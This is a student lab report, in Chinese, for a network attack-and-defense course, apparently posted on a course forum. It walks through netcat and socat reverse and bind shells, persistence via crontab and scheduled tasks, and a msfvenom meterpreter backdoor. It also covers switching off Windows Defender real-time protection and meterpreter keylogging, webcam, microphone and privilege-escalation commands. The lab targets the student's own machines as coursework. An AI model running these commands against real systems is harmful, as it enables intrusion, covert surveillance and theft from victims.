学号 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212424邓熠泽 2024-04-03 18:37:14

1.实验内容

1.1实验目标

(1)学习netcat、socat的相关操作和知识,来获取主机shell。

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

(6)学习免杀原理的相关知识与技术。

1.2回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
未授权访问后门:开发者或攻击者可能会故意留下一个隐藏的功能,这个功能允许绕过正常的认证方法来获得系统的访问权限。例如,一个网络服务可能会存在一个未文档化的特殊API密钥或命令,仅开发人员知晓。通过键入特定的指令或使用这个密钥,攻击者可以获得对软件或系统更高等级的控制权限。

(2)例举你知道的后门如何启动起来(win及linux)的方式?
可以通过利用操作系统或应用程序中的已知漏洞,来运行恶意代码或获得系统访问权限。或者通过欺骗邮件、恶意链接等欺骗被攻击者安装后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?
远程shell和创建后门。
(4)如何发现自己有系统有没有被安装后门?
使用安全软件进行电脑检测,查看注册表、日志表等是否有不明记录。

2.实验过程

2.1实验环境

1.电脑(主机)--IP:192.168.0.192,虚拟机kali--IP:192.168.56.5。
2.安装并配置好ncat、socat。

2.2使用netcat获取主机操作Shell,cron启动某项任务

在电脑主机中开启监听,最好进入ncat.exe所在的工作目录

  ncat.exe -l -p 537 #我选用537端口

在kali中通过ncat与win10主机建立反弹式连接

nc 192.168.0.192 537 -e /bin/sh #IP是主机的,端口保持一致

img

img

主机此时调用了kali的shell
在kali中运行指令

crontab -e #执行文字编辑器来设定时程表,这里选择的是2:/usr/bin/vim.basic
加入内容:
20 * * * * /bin/netcat 192.168.0.192 537 -e /bin/sh #IP地址是win主机的,在每小时的第20分钟启动任务

img


在Win10中进行操作

Crontab -l
Crontab -e

img

在这里我发现输入Crontab -e不能编辑,从kali中(/var/spool/cron目录下),以root身份打开

img

回到主机
查看当前文件目录
查看你在的目录,进入管理员模式
然后我们通过echo命令直接对文件本身进行修改:

echo "* * * * * echo "20212424" > /home/dyz20212424/Desktop/CS2.txt" > /var/spool/cron/crontabs/root   
 #每分钟定时执行一次,用“20212424”覆盖文件CS2.txt

img

先在文件中随便输一下内容:

img

运行echo后发现内容更改

img

2.3使用socat获取主机操作Shell, 任务计划启动

主机的cmd中进入到socat所在的目录下,开启监听:

socat.exe tcp-listen:2424 exec:cmd.exe,pty,stderr    #把cmd.exe绑定到端口2424

img

socat - tcp:192.168.56.5:2424

img

Ipconfig会乱码,输入

Chcp 65001

img

C语言代码,编译运行后形成test2.exe文件

//test2.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
 
int main(void)
{
    
    char *wday[] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"};
    time_t timep;
    struct tm *p;
    time (&timep);
    p=gmtime(&timep);
    FILE *fp;
    fp = fopen("C:\\Users\\Public\text.txt","a+");
    fprintf(fp,"%s","Hello from dyz20212424");
    fprintf(fp,"%d/%d/%d ", (p->tm_year+1900), (p->tm_mon+1), p->tm_mday);
    fprintf(fp,"%s %d:%d:%d\n", wday[p->tm_wday], ((p->tm_hour)+8)%24, p->tm_min, p->tm_sec);
    
     fclose(fp);
    return 1;
}
 

通过指令:gcc .c文件 -o .exe文件名编译
把exe它放到socat目录下

img

在kali中输入

schtasks /create /sc minute /mo 1 /tn “20212424text” /tr E:\socat\socat\test2.exe   

在主机控制面板的系统和安全中,找到计划启动:

img

img

2.4使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在kali上生成可执行文件20212424_backdoor.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=2424 -f exe > 20212424_backdoor.exe    #kali的IP、端口号2424

img

ncat.exe -l 2424 > 20212424_backdoor.exe    #主机
nc 192.168.0.192 2424 < 20202424_backdoor.exe #kali终端           IP地址为主机的

img

img

接着在主机的“病毒与威胁防护”设置中关闭“实时保护”,避免后门程序被杀软识别

img

在kali中进入MSF配置台,并配置参数

msfconsole    #进入控制台
use exploit/multi/handler    #使用监听模块
set payload windows/meterpreter/reverse_tcp    #使用和生成后门程序时相同的payload
set LHOST 192.168.56.5    #kali的IP,需要和之前生成后门程序时设置的IP相同
set LPORT 2424    #设置端口,需要和之前生成后门程序时设置的端口相同
show options    #显示参数配置情况,同时也是检查参数是否正确设置的必要步骤
exploit    #开启监听,同时在win10中运行exe文件

img

2.5使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

record_mic -d 10  #截获音频,-d用来设置录制时间
screenshot  #截屏
webcam_snap    #打开摄像头拍照
keyscan_start #开始记录击键过程
keyscan_dump #读取击键记录

截获音频

img

img

开始记录击键过程
读取击键记录

img

img

提权成功

img

2.6使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

首先对pwn检查是否需要更改:

img

在一个kali 的控制界面的MSF中生成所需要的shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=2424 -f c

img


完成

3.问题及解决方案

问题1:关闭实时保护功能的时候仍然无法运行程序

解决方案:重启虚拟机,可能是虚拟机暂停后VMWARE闪退出现的某些BUG。

问题2:后门exe无法允许运行

解决方案:将后门exe放入被信任的项目,关闭实时保护,成功运行

4.学习感悟及思考

在实验过程中,我了解了网络安全领域的一些重要概念和技术,包括后门、Netcat、Socat、Cron、MSF Meterpreter等。过程非常繁琐,但通过实践后能体会到其中的思路非常清晰,遇到的问题也需要在百度中查找。这次实验让我对后门的相关用途有了直观的认识,也让我对网络攻防这门课有了更深刻的理解。
...全文
33 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

73

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧